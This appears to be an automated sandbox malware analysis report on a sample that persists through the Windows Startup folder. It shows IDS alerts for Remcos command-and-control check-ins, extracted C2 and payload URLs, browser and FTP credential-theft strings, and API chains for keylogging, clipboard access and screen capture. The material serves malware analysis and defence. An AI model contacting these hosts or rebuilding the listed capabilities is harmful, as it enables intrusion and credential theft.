                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 11_2_00403AC1 __EH_prolog,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator
@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@Q11_2_00403AC1
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00403F4D ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,tolower,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,tolower,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,11_2_00403F4D
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0041178F ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,FindFirstFileW,wcscpy,RemoveDirectoryW,FindNextFileW,wcscat,RemoveDirectoryW,wcscpy,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,11_2_0041178F
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0040C800 GetLogicalDriveStringsA,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z,?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040C800
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\Documents\desktop.ini
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local\Temp
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\AppData\Local
                    Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user\Desktop\desktop.ini

                    Networking

                    Source: Network traffic | Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49705 -> 154.16.63.197:3360
                    Source: Network traffic | Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49751 -> 154.16.63.197:3360
                    Source: Network traffic | Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49815 -> 154.16.63.197:3360
                    Source: Network traffic | Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49878 -> 154.16.63.197:3360
                    Source: Network traffic | Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49942 -> 154.16.63.197:3360
                    Source: Network traffic | Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49982 -> 154.16.63.197:3360
                    Source: Network traffic | Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49984 -> 154.16.63.197:3360
                    Source: Network traffic | Suricata IDS: 2829308 - Severity 1 - ETPRO MALWARE MSIL/Remcos Variant CnC Checkin : 192.168.2.5:49981 -> 154.16.63.197:3360
                    Source: Malware configuration extractor | URLs: http://admino.ml/eme/gate.php
                    Source: Malware configuration extractor | URLs: http://admino.ml/eme/kachistub.exe
                    Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 154.16.63.197:3360
                    Source: global traffic | HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 13 Dec 2024 16:57:34 GMTContent-Type: application/x-msdownloadContent-Length: 853504Connection: keep-aliveLast-Modified: Wed, 06 Jun 2018 00:46:15 GMTAccept-Ranges: bytesCache-Control: max-age=259200Expires: Mon, 16 Dec 2024 16:57:34 GMT
                    Source: Joe Sandbox View | ASN Name: ASDETUKhttpwwwheficedcomGB ASDETUKhttpwwwheficedcomGB
                    Source: Network traffic | Suricata IDS: 2022550 - Severity 1 - ET MALWARE Possible Malicious Macro DL EXE Feb 2016 : 192.168.2.5:49704 -> 93.125.99.121:80
                    Source: global traffic | HTTP traffic detected: GET /tags/scan.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: www.mva.byConnection: Keep-Alive
                    Source: unknown | TCP traffic detected without corresponding DNS query: 154.16.63.197
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_004020D0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_004020D0
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp | String found in binary or memory: ?%02XSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: SGS.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: global traffic | DNS traffic detected: DNS query: www.mva.by
                    Source: global traffic | DNS traffic detected: DNS query: admino.ml
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp | String found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
                    Source: SGS.exe, SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp | String found in binary or memory: http://admino.ml/eme/gate.php
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp | String found in binary or memory: http://admino.ml/eme/gate.phphttp://admino.ml/eme/kachistub.exeYUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1
                    Source: SGS.exe, SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2350240628.0000000000414000.00000004.00000400.00020000.00000000.sdmp | String found in binary or memory: http://admino.ml/eme/kachistub.exe
                    Source: SGS.exe, 00000005.00000002.2198881241.0000000000414000.00000004.00000400.00020000.00000000.sdmp | String found in binary or memory: http://https://ftp://operawand.dat_Software
                    Source: SGS.exe, 00000005.00000002.2198847156.0000000000413000.00000002.00000400.00020000.00000000.sdmp | String found in binary or memory: http://www.ibsensoftware.com/
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/=
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/G
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/T
                    Source: file.exe, 00000009.00000002.2305977455.000000000086E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/tags/scan.exe
                    Source: file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/tags/scan.exeA%#%#%$#%A1
                    Source: file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/tags/scan.exeA%#%#%$#%A1#%#%$#%A1
                    Source: file.exe, 00000000.00000003.2085543443.0000000002960000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/tags/scan.exeA%#%#%$#%A1ca
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/tags/scan.exeLMEM
                    Source: file.exe, 00000009.00000002.2306159539.000000000090E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000009.00000003.2304232651.00000000008FE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/tags/scan.exeRRC:
                    Source: file.exe, 00000009.00000002.2305977455.000000000086E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/tags/scan.exe_A
                    Source: file.exe, 00000000.00000003.2126925157.0000000000737000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/tags/scan.execrC:
                    Source: file.exe, 00000000.00000002.2142430073.00000000006E5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/tags/scan.exeh
                    Source: file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.mva.by/tags/scan.exeystem32
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: file.exe, 00000000.00000002.2142430073.000000000072B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126925157.0000000000728000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000002.2351272008.0000000000628000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                    Source: SGS.exe, 00000005.00000002.2199326644.00000000006E8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: SGS.exe, 00000005.00000003.2179659911.000000000074F000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 00000005.00000003.2179383917.000000000074E000.00000004.00000020.00020000.00000000.sdmp, SGS.exe, 0000000C.00000003.2334120325.0000000000688000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [Esc] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [Enter] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [Tab] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [Down] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [Right] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [Up] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [Left] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [End] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [F2] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [F1] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: [Del] 11_2_004051EA
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_00404643 SetWindowsHookExA 0000000D,00404628,00000000,0000000011_2_00404643
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0040C5BF ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,OpenClipboard,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040C5BF
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0040E25E EmptyClipboard,?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ,GlobalAlloc,GlobalLock,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,11_2_0040E25E
                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe | Code function: 11_2_0040F0DF Sleep,CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,DeleteDC,DeleteDC,DeleteDC,DeleteObject,SelectObject,DeleteDC,DeleteDC,DeleteDC,DeleteObject,StretchBlt,DeleteDC,DeleteDC,DeleteDC,DeleteObject,DeleteObject,GetCursorInfo,GetIconInfo,DeleteObject,DeleteObject,DrawIcon,GetObjectA,DeleteDC,DeleteDC,DeleteDC,DeleteObject,LocalAlloc,GlobalAlloc,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GetDIBits,DeleteDC,DeleteDC,DeleteDC,DeleteObject,GlobalFree,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,DeleteObject,GlobalFree,DeleteDC,DeleteDC,DeleteDC,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@A